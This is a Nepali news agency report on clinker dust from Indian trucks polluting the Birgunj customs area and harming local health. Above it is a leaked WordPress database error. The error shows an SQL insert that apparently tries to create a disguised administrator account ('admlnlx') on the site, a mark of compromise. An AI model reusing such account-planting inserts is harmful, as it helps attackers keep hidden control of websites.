WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWxOvjl4UD0hlufYLxchKnVa53rr/O/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 13:31:57', '', 'admlnlx', 'admlnlx')
वीरगन्ज, पुस ८–
वीरगन्ज भन्सारको बाटो भएर आउने क्लिङ्करको धुलो उड्दा वीरगन्ज भन्सार क्षेत्र धुलाम्य हुनुका साथै बढ्दो वायु प्रदूषणबाट त्यस क्षेत्रका कर्मचारी तथा स्थानीयवासीको स्वास्थ्यमा प्रत्यक्ष असर पर्न थालेको छ ।
सिमेन्टको कच्चा पदार्थका रुपमा रहेको क्लिङ्कर बोकेको ट्रक त्रिपालले छोपिएर ल्याए पनि त्यसको कण उड्ने गरेकाले वायु प्रदूषण बढ्नुका साथै डिउटीमा रहेका कर्मचारी, सुरक्षाकर्मी तथा सर्वसाधारणको स्वास्थ्यमा प्रतिकूल असर पर्ने गरेको गुनासो बढ्दै गएको छ ।
सीमावर्ती भारतीय बजार रक्सौलबाट प्रतिदिन ५० देखि ६० वटा ट्रक क्लिङ्कर बोकी वीरगन्ज भन्सारको बाटो भएर नेपाल भित्रिने गरेकाले क्लिङ्करको कण उडेर नेपाल–भारतको सीमाद्वार ‘शङ्कराचार्य गेट’ पनि धुलाम्य भएकाले त्यसको सौन्दर्यमा समेत प्रभाव परेको छ भने त्यस क्षेत्रमा रहेका रूख, बिरुवा तथा घरहरुमा समेत धुलोले प्रभाव पारेको छ ।
पर्सा बारामा रहेका १० वटा सिमेन्ट उद्योगका लागि दैनिक ६० भन्दा बढी ट्रक क्लिङ्कर बोकेर भन्सारको बाटो नेपाल भित्रिने गरेकाले त्यसको धुलोले सर्वसाधारणलाई असर पर्ने गरेको वीरगन्ज भन्सार कार्यालयका अधिकृत अमित तिवारीले बताउनुभयो । क्लिङ्करको धुलोको कण उड्दा त्यस क्षेत्रका मानिसलाई मास्क लगाउनपर्ने बाध्यता रहेको छ भने क्लिङ्कर बोकेको ट्रक बाइपासबाट निस्कने गरेकाले त्यस क्षेत्रका घरहरु पनि प्रभावित देखिन्छन् ।
क्लिङ्करको धुलो उडेर आँखा, नाक, मुखमा पस्ने गरेका कारण त्यस भेगका मानिस विभिन्न रोगको सिकार हुने गरेकाले सम्बन्धित निकायले क्लिङ्कर ल्याउने कामलाई व्यवस्थित गर्नुपर्ने माग पर्सावासीको छ । –रासस